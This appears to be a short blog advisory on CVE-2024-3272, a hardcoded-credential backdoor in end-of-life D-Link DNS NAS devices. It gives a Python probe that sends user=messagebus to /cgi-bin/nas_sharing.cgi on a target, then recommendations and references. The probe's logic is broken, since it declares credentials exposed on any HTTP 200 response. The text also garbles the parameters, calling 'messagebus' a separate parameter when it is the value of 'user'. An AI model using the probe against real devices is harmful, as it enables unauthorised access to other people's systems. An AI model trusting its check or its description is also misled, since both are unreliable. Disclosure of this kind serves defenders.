In this post, we'll take a detailed look at a very critical vulnerability (CVE-2024-3272) found in unsupported D-Link DNS products, specifically the DNS-320L, DNS-325, DNS-327L, and DNS-340L models up until firmware version 20240403. This vulnerability has been assigned an identifier of VDB-259283 and affects the unknown processing of the /cgi-bin/nas_sharing.cgi file related to the HTTP GET request handler. The vulnerability may be exploited by remotely manipulating the 'user' argument in combination with the input 'messagebus' leading to hardcoded credentials being exposed. We will also outline the details of the exploit and provide relevant reference links.

Code Snippet

import requests

target_url = "http://<target_IP>/cgi-bin/nas_sharing.cgi";
params = {
    "action": "get_shared_folders",
    "sid": "dummySID",
    "user": "messagebus"
}

response = requests.get(target_url, params=params)

if response.status_code == 200:
    print("Hardcoded credentials found!")
else:
    print("Target not vulnerable.")

This Python code snippet demonstrates how an attacker can send an HTTP GET request with manipulated 'user' and 'messagebus' parameters to target the vulnerable D-Link DNS devices. If the targeted device is indeed vulnerable, hardcoded credentials will be exposed.

Exploit Details

The vulnerability allows an attacker to remotely initiate an attack against devices with firmware versions up until 20240403 by manipulating the 'user' and 'messagebus' values. This exploit can potentially grant unauthorized access to critical system information and could lead to further compromise or malicious actions.

It is important to note that this vulnerability affects products that are no longer supported by the manufacturer and have reached their end-of-life (EOL). The vendor has been contacted and they immediately confirmed that the products in question are EOL.

Recommendations

Given the very critical nature of this vulnerability and the fact that the affected products are no longer supported, it is highly recommended that users of the vulnerable D-Link DNS devices:

Immediately retire and replace the unsupported devices with updated, supported models.

2. Review and strengthen their network security measures to mitigate potential risks posed by this vulnerability.

References

For further information and original references about the vulnerability, please refer to the following links:

1. CVE-2024-3272
2. D-Link DNS Product Security Advisory
3. VDB-259283: Vulnerability Details and Disclosure

Conclusion

CVE-2024-3272 is a very critical vulnerability that has been discovered in unsupported D-Link DNS products, potentially exposing hardcoded credentials and allowing attackers unauthorized access to sensitive system information. It is crucial for users to retire and replace the affected devices and take necessary precautions to protect their networks from potential attacks.

Timeline

Published on: 04/04/2024 01:15:50 UTC
Last modified on: 05/23/2024 18:11:31 UTC